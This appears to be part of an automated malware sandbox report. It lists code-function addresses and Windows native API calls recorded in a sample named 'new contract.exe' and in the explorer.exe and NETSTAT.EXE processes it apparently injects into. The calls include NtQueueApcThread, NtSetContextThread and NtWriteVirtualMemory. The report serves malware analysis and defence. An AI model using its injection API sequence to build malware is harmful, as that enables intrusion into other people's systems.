          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03182BA0 NtEnumerateValueKey, | 5_2_03182BA0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03182AB0 NtWaitForSingleObject, | 5_2_03182AB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03182AF0 NtWriteFile, | 5_2_03182AF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03182F60 NtCreateProcessEx, | 5_2_03182F60
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03182F90 NtProtectVirtualMemory, | 5_2_03182F90
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03182FB0 NtResumeThread, | 5_2_03182FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03182FA0 NtQuerySection, | 5_2_03182FA0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03182E30 NtWriteVirtualMemory, | 5_2_03182E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03182E80 NtReadVirtualMemory, | 5_2_03182E80
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03182EE0 NtQueueApcThread, | 5_2_03182EE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03182D00 NtSetInformationFile, | 5_2_03182D00
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03182D30 NtUnmapViewOfSection, | 5_2_03182D30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03182DB0 NtEnumerateKey,5_2_03182DB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03182C00 NtQueryInformationProcess,5_2_03182C00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03182CC0 NtQueryVirtualMemory,5_2_03182CC0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03182CF0 NtOpenProcess,5_2_03182CF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03183010 NtOpenDirectoryObject,5_2_03183010
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03183090 NtSetValueKey,5_2_03183090
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_031839B0 NtGetContextThread,5_2_031839B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03183D10 NtOpenProcessToken,5_2_03183D10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03183D70 NtOpenThread,5_2_03183D70
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0052A320 NtCreateFile,5_2_0052A320
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0052A3D0 NtReadFile,5_2_0052A3D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0052A450 NtClose,5_2_0052A450
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0052A500 NtAllocateVirtualMemory,5_2_0052A500
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0052A2DA NtCreateFile,5_2_0052A2DA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0052A44A NtClose,5_2_0052A44A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02DB9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,5_2_02DB9BAF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02DBA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,5_2_02DBA036
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02DB9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_02DB9BB2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02DBA042 NtQueryInformationProcess,5_2_02DBA042
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 0_2_077B07B0, 0_2_077B07B0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 0_2_077A4D3B, 0_2_077A4D3B
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 0_2_014BD5BC, 0_2_014BD5BC
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 0_2_07988348, 0_2_07988348
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 0_2_07981E18, 0_2_07981E18
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 0_2_07981E28, 0_2_07981E28
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 0_2_07983668, 0_2_07983668
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 0_2_07983AA0, 0_2_07983AA0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 0_2_07982260, 0_2_07982260
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 0_2_079819F0, 0_2_079819F0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 0_2_079819E1, 0_2_079819E1
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0041E803, 2_2_0041E803
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_00401030, 2_2_00401030
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0041E1C7, 2_2_0041E1C7
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0041DD0B, 2_2_0041DD0B
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_00402D88, 2_2_00402D88
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_00402D90, 2_2_00402D90
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0041E5A5, 2_2_0041E5A5
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_00409E4D, 2_2_00409E4D
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_00409E50, 2_2_00409E50
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0041D734, 2_2_0041D734
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_00402FB0, 2_2_00402FB0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016B8158, 2_2_016B8158
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01620100, 2_2_01620100
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016CA118, 2_2_016CA118
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016E81CC, 2_2_016E81CC
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016F01AA, 2_2_016F01AA
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016E41A2, 2_2_016E41A2
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016C2000, 2_2_016C2000
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016EA352, 2_2_016EA352
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016F03E6, 2_2_016F03E6
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0163E3F0, 2_2_0163E3F0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016D0274, 2_2_016D0274
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016B02C0, 2_2_016B02C0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01630535, 2_2_01630535
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016F0591, 2_2_016F0591
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016E2446, 2_2_016E2446
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016D4420, 2_2_016D4420
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016DE4F6, 2_2_016DE4F6
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01630770, 2_2_01630770
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01654750, 2_2_01654750
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0162C7C0, 2_2_0162C7C0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0164C6E0, 2_2_0164C6E0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01646962, 2_2_01646962
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016329A0, 2_2_016329A0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016FA9A6, 2_2_016FA9A6
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0163A840, 2_2_0163A840
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01632840, 2_2_01632840
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0165E8F0, 2_2_0165E8F0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016168B8, 2_2_016168B8
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016EAB40, 2_2_016EAB40
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016E6BD7, 2_2_016E6BD7
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0162EA80, 2_2_0162EA80
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0163AD00, 2_2_0163AD00
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016CCD1F, 2_2_016CCD1F
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0162ADE0, 2_2_0162ADE0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01648DBF, 2_2_01648DBF
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01630C00, 2_2_01630C00
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01620CF2, 2_2_01620CF2
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016D0CB5, 2_2_016D0CB5
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016A4F40, 2_2_016A4F40
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01672F28, 2_2_01672F28
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01650F30, 2_2_01650F30
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016D2F30, 2_2_016D2F30
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01622FC8, 2_2_01622FC8
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016AEFA0, 2_2_016AEFA0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01630E59, 2_2_01630E59
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016EEE26, 2_2_016EEE26
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016EEEDB, 2_2_016EEEDB
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01642E90, 2_2_01642E90
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016ECE93, 2_2_016ECE93
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016FB16B, 2_2_016FB16B
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0166516C, 2_2_0166516C
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0161F172, 2_2_0161F172
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0163B1B0, 2_2_0163B1B0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016E70E9, 2_2_016E70E9
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016EF0E0, 2_2_016EF0E0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016DF0CC, 2_2_016DF0CC
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016370C0, 2_2_016370C0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0161D34C, 2_2_0161D34C
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016E132D, 2_2_016E132D
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0167739A, 2_2_0167739A
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016D12ED, 2_2_016D12ED
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0164D2F0, 2_2_0164D2F0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0164B2C0, 2_2_0164B2C0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016352A0, 2_2_016352A0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016E7571, 2_2_016E7571
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016F95C3, 2_2_016F95C3
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016CD5B0, 2_2_016CD5B0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01621460, 2_2_01621460
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016EF43F, 2_2_016EF43F
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016EF7B0, 2_2_016EF7B0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01675630, 2_2_01675630
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016E16CC, 2_2_016E16CC
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01639950, 2_2_01639950
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0164B950, 2_2_0164B950
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016C5910, 2_2_016C5910
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0169D800, 2_2_0169D800
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016338E0, 2_2_016338E0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016EFB76, 2_2_016EFB76
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016A5BF0, 2_2_016A5BF0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0166DBF9, 2_2_0166DBF9
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0164FB80, 2_2_0164FB80
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016A3A6C, 2_2_016A3A6C
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016EFA49, 2_2_016EFA49
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016E7A46, 2_2_016E7A46
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016DDAC6, 2_2_016DDAC6
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016CDAAC, 2_2_016CDAAC
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01675AA0, 2_2_01675AA0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016D1AA3, 2_2_016D1AA3
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016E7D73, 2_2_016E7D73
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01633D40, 2_2_01633D40
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016E1D5A, 2_2_016E1D5A
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0164FDC0, 2_2_0164FDC0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016A9C32, 2_2_016A9C32
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016EFCF2, 2_2_016EFCF2
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016EFF09, 2_2_016EFF09
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_015F3FD5, 2_2_015F3FD5
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_015F3FD2, 2_2_015F3FD2
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016EFFB1, 2_2_016EFFB1
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01631F92, 2_2_01631F92
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01639EB0, 2_2_01639EB0
          Source: C:\Windows\explorer.exe | Code function: 3_2_0E4E3232, 3_2_0E4E3232
          Source: C:\Windows\explorer.exe | Code function: 3_2_0E4E2036, 3_2_0E4E2036
          Source: C:\Windows\explorer.exe | Code function: 3_2_0E4D9082, 3_2_0E4D9082
          Source: C:\Windows\explorer.exe | Code function: 3_2_0E4DAD02, 3_2_0E4DAD02
          Source: C:\Windows\explorer.exe | Code function: 3_2_0E4E0912, 3_2_0E4E0912
          Source: C:\Windows\explorer.exe | Code function: 3_2_0E4DDB30, 3_2_0E4DDB30
          Source: C:\Windows\explorer.exe | Code function: 3_2_0E4DDB32, 3_2_0E4DDB32
          Source: C:\Windows\explorer.exe | Code function: 3_2_0E4E65CD, 3_2_0E4E65CD
          Source: C:\Windows\explorer.exe | Code function: 3_2_0FB3CB32, 3_2_0FB3CB32
          Source: C:\Windows\explorer.exe | Code function: 3_2_0FB3CB30, 3_2_0FB3CB30
          Source: C:\Windows\explorer.exe | Code function: 3_2_0FB42232, 3_2_0FB42232
          Source: C:\Windows\explorer.exe | Code function: 3_2_0FB455CD, 3_2_0FB455CD
          Source: C:\Windows\explorer.exe | Code function: 3_2_0FB3F912, 3_2_0FB3F912
          Source: C:\Windows\explorer.exe | Code function: 3_2_0FB39D02, 3_2_0FB39D02
          Source: C:\Windows\explorer.exe | Code function: 3_2_0FB38082, 3_2_0FB38082
          Source: C:\Windows\explorer.exe | Code function: 3_2_0FB41036, 3_2_0FB41036
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_00682167, 5_2_00682167
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_00681715, 5_2_00681715
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0320A352, 5_2_0320A352
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_032103E6, 5_2_032103E6
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0315E3F0, 5_2_0315E3F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_031F0274, 5_2_031F0274
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_031D02C0, 5_2_031D02C0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_031EA118, 5_2_031EA118
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03140100, 5_2_03140100
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_031D8158, 5_2_031D8158
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_032101AA, 5_2_032101AA
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_032081CC, 5_2_032081CC
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_031E2000, 5_2_031E2000
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03174750, 5_2_03174750
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03150770, 5_2_03150770
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0314C7C0, 5_2_0314C7C0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0316C6E0, 5_2_0316C6E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03150535, 5_2_03150535
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03210591, 5_2_03210591
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_031F4420, 5_2_031F4420
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03202446, 5_2_03202446
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_031FE4F6, 5_2_031FE4F6
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0320AB40, 5_2_0320AB40
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03206BD7, 5_2_03206BD7
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0314EA80, 5_2_0314EA80
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03166962, 5_2_03166962
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0321A9A6, 5_2_0321A9A6
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_031529A0, 5_2_031529A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03152840, 5_2_03152840
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0315A840, 5_2_0315A840
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_031368B8, 5_2_031368B8
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0317E8F0, 5_2_0317E8F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03170F30, 5_2_03170F30
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_031F2F30, 5_2_031F2F30
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03192F28, 5_2_03192F28
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_031C4F40, 5_2_031C4F40
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_031CEFA0, 5_2_031CEFA0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03142FC8, 5_2_03142FC8
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0320EE26, 5_2_0320EE26
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03150E59, 5_2_03150E59
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03162E90, 5_2_03162E90
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0320CE93, 5_2_0320CE93
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0320EEDB, 5_2_0320EEDB
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_031ECD1F, 5_2_031ECD1F
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0315AD00, 5_2_0315AD00
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03168DBF, 5_2_03168DBF
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0314ADE0, 5_2_0314ADE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03150C00, 5_2_03150C00
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_031F0CB5, 5_2_031F0CB5
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03140CF2, 5_2_03140CF2
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0320132D, 5_2_0320132D
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0313D34C, 5_2_0313D34C
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0319739A, 5_2_0319739A
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_031552A0, 5_2_031552A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0316B2C0, 5_2_0316B2C0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0316D2F0, 5_2_0316D2F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_031F12ED, 5_2_031F12ED
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0321B16B, 5_2_0321B16B
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0313F172, 5_2_0313F172
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0318516C, 5_2_0318516C
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0315B1B0, 5_2_0315B1B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0320F0E0, 5_2_0320F0E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_032070E9, 5_2_032070E9
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_031FF0CC, 5_2_031FF0CC
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_031570C0, 5_2_031570C0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0320F7B0, 5_2_0320F7B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_032016CC, 5_2_032016CC
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03207571, 5_2_03207571
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_031ED5B0, 5_2_031ED5B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0320F43F, 5_2_0320F43F
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03141460, 5_2_03141460
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0320FB76, 5_2_0320FB76
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0316FB80, 5_2_0316FB80
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0318DBF9, 5_2_0318DBF9
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_031C5BF0, 5_2_031C5BF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03207A46, 5_2_03207A46
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0320FA49, 5_2_0320FA49
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_031C3A6C, 5_2_031C3A6C
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_031EDAAC, 5_2_031EDAAC
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03195AA0, 5_2_03195AA0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_031F1AA3, 5_2_031F1AA3
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_031FDAC6, 5_2_031FDAC6
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_031E5910, 5_2_031E5910
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03159950, 5_2_03159950
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0316B950, 5_2_0316B950
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_031BD800, 5_2_031BD800
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_031538E0, 5_2_031538E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0320FF09, 5_2_0320FF09
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03151F92, 5_2_03151F92
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0320FFB1, 5_2_0320FFB1
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03159EB0, 5_2_03159EB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03207D73, 5_2_03207D73
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03153D40, 5_2_03153D40
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03201D5A, 5_2_03201D5A
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0316FDC0, 5_2_0316FDC0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_031C9C32, 5_2_031C9C32
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0320FCF2, 5_2_0320FCF2
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0052E1C7, 5_2_0052E1C7
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0052E5A5, 5_2_0052E5A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0052D734, 5_2_0052D734
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0052E803, 5_2_0052E803
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_0052DD0B, 5_2_0052DD0B
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_00512D90, 5_2_00512D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_00512D88, 5_2_00512D88
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_00519E50, 5_2_00519E50
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_00519E4D, 5_2_00519E4D
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_00512FB0, 5_2_00512FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_02DBA036, 5_2_02DBA036
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_02DBB232, 5_2_02DBB232
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_02DB5B32, 5_2_02DB5B32
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_02DB5B30, 5_2_02DB5B30
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_02DB1082, 5_2_02DB1082
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_02DB8912, 5_2_02DB8912
